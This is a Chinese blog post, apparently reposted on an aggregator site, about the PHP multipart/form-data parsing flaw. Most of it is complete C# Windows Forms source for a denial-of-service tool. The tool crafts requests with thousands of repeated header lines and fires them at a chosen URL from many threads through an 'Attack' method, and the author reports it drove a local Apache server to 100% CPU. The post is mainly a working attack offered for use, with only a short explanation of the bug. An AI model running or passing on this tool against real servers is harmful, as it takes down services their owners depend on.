php multipart/form-data DOS C#测试工具
来源:互联网 发布:知乎更新图标 编辑:程序博客网 时间:2024/06/14 05:59
根据乌云网,百度攻防安全实验室提供的最新漏洞,存在于php各版本:
PHP解析multipart/form-data http
请求的body part请求头时,重复拷贝字符串导致DOS。远程攻击者通过发送恶意构造的multipart/form-data
请求,导致服务器CPU资源被耗尽,从而远程DOS服务器。
原文链接:http://drops.wooyun.org/papers/6077
大致是因为php解析请求时,是按行读取数据,然后每读取一行进行一次内存分配和内存拷贝,这样会耗掉n^2的时间,原文的利用方式是Python,现提供C#的代码:
对本地测试的结果,apache cpu占用100%:
代码:
using System;using System.Collections.Generic;using System.Collections.Specialized;using System.ComponentModel;using System.Data;using System.Drawing;using System.IO;using System.Linq;using System.Net;using System.Text;using System.Threading.Tasks;using System.Windows.Forms;using System.Threading;namespace WindowsFormsApplication1{ public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button1_Click(object sender, EventArgs e) { string s = HttpPostData().ToString(); s = "响应时间:" + s; MessageBox.Show(s); } private double HttpPostData() { string url=this.textBox1.Text; int timeOut = 10000, lcount = int.Parse(textBox2.Text); string responseContent; string fileKeyName = "file"; string filePath = "58.jpg"; var memStream = new MemoryStream(); var webRequest = (HttpWebRequest)WebRequest.Create(url); // 边界符 var boundary = "---------------" + DateTime.Now.Ticks.ToString("x"); // 边界符 var beginBoundary = Encoding.ASCII.GetBytes("--" + boundary + "\r\n"); // 最后的结束符 var endBoundary = Encoding.ASCII.GetBytes("--" + boundary + "--\r\n"); // 设置属性 webRequest.Method = "POST"; webRequest.Timeout = timeOut; webRequest.ContentType = "multipart/form-data; boundary=" + boundary; // 写入文件 const string filePartHeader = "Content-Disposition: form-data; name=\"{0}\"; filename=\"s"; var header = string.Format(filePartHeader, fileKeyName); var headerbytes = Encoding.UTF8.GetBytes(header); memStream.Write(beginBoundary, 0, beginBoundary.Length); memStream.Write(headerbytes, 0, headerbytes.Length); var buffer = new byte[2]; buffer = Encoding.UTF8.GetBytes("a\n"); int bytesRead=2; // =0 for (int i = 0; i < lcount;i++ ) memStream.Write(buffer, 0, bytesRead); var bb = "\"\nContent-Type: application/octet-stream\r\n\r\ndatadata\r\n"; bb += boundary; bb += "--"; var body = new byte[1024]; body=Encoding.UTF8.GetBytes(bb); memStream.Write(body, 0, Encoding.UTF8.GetByteCount(bb)); // 写入最后的结束边界符 memStream.Write(endBoundary, 0, endBoundary.Length); webRequest.ContentLength = memStream.Length; var requestStream = webRequest.GetRequestStream(); memStream.Position = 0; var tempBuffer = new byte[memStream.Length]; memStream.Read(tempBuffer, 0, tempBuffer.Length); memStream.Close(); requestStream.Write(tempBuffer, 0, tempBuffer.Length); requestStream.Close(); DateTime d = DateTime.Now; var httpWebResponse = (HttpWebResponse)webRequest.GetResponse(); using (var httpStreamReader = new StreamReader(httpWebResponse.GetResponseStream(), Encoding.GetEncoding("utf-8"))) { responseContent = httpStreamReader.ReadToEnd(); } httpWebResponse.Close(); webRequest.Abort(); return (DateTime.Now-d).TotalSeconds; } private void Attack() { string url = this.textBox1.Text; int timeOut = 10000, lcount = int.Parse(textBox2.Text); string responseContent; string fileKeyName = "file"; string filePath = "58.jpg"; var memStream = new MemoryStream(); var webRequest = (HttpWebRequest)WebRequest.Create(url); // 边界符 var boundary = "---------------" + DateTime.Now.Ticks.ToString("x"); // 边界符 var beginBoundary = Encoding.ASCII.GetBytes("--" + boundary + "\r\n"); // 最后的结束符 var endBoundary = Encoding.ASCII.GetBytes("--" + boundary + "--\r\n"); // 设置属性 webRequest.Method = "POST"; webRequest.Timeout = timeOut; webRequest.ContentType = "multipart/form-data; boundary=" + boundary; // 写入文件 const string filePartHeader = "Content-Disposition: form-data; name=\"{0}\"; filename=\"s"; var header = string.Format(filePartHeader, fileKeyName); var headerbytes = Encoding.UTF8.GetBytes(header); memStream.Write(beginBoundary, 0, beginBoundary.Length); memStream.Write(headerbytes, 0, headerbytes.Length); var buffer = new byte[2]; buffer = Encoding.UTF8.GetBytes("a\n"); int bytesRead = 2; // =0 for (int i = 0; i < lcount; i++) memStream.Write(buffer, 0, bytesRead); var bb = "\"\nContent-Type: application/octet-stream\r\n\r\ndatadata\r\n"; bb += boundary; bb += "--"; var body = new byte[1024]; body = Encoding.UTF8.GetBytes(bb); memStream.Write(body, 0, Encoding.UTF8.GetByteCount(bb)); // 写入最后的结束边界符 memStream.Write(endBoundary, 0, endBoundary.Length); webRequest.ContentLength = memStream.Length; var requestStream = webRequest.GetRequestStream(); memStream.Position = 0; var tempBuffer = new byte[memStream.Length]; memStream.Read(tempBuffer, 0, tempBuffer.Length); memStream.Close(); requestStream.Write(tempBuffer, 0, tempBuffer.Length); requestStream.Close(); DateTime d = DateTime.Now; var httpWebResponse = (HttpWebResponse)webRequest.GetResponse(); using (var httpStreamReader = new StreamReader(httpWebResponse.GetResponseStream(), Encoding.GetEncoding("utf-8"))) { responseContent = httpStreamReader.ReadToEnd(); } httpWebResponse.Close(); webRequest.Abort(); } private void button2_Click(object sender, EventArgs e) { int n = int.Parse(textBox3.Text); for(int i=0;i<n;i++) { new Thread(Attack).Start(); } } }}
1 0
- php multipart/form-data DOS C#测试工具
- PHP multipart/form-data 远程DOS漏洞
- PHP multipart/form-data 远程DOS漏洞
- PHP - WIN2003下修复PHP远程DoS漏洞(PHP Multipart/form-data remote dos Vulnerability)
- PHP 远程 DoS 漏洞(PHP Multipart/form-data remote dos Vulnerability)
- C#版的MS MultiPart/Form-Data
- php 获取 multipart/form-data 的raw data
- php 获取 multipart/form-data 的raw data
- 关于multipart/form-data
- multipart/form-data
- multipart/form-data
- multipart/form-data
- Multipart/form-data POST
- apiary multipart/form-data
- multipart/form-data
- multipart/form-data
- php HTTP请求类,支持GET,POST,Multipart/form-data
- php 使用multipart/form-data的HTTP请求类
- UILocalNotification实现本地通知
- hdu1212 Big Number &第六届山东省赛Single Round Math (同余定理,大数取模)
- Java数组操作的10大方法
- “正由另一进程使用,因此该进程无法访问该文件”的解决办法
- C++双向循环链表
- php multipart/form-data DOS C#测试工具
- 第九周 项目五--方程也是类
- [leetcode][tree][stack] Binary Search Tree Iterator
- IOS 整体框架类图值得收藏
- 稻盛和夫给中国企业家的忠告
- ServiceStack.Redis 使用过程中碰到的两个问题
- 随机更换背景颜色和背景时钟
- Hibernate入门
- 【原创】sqlite3数据库SQL error: database disk image is malformed问题探究(1)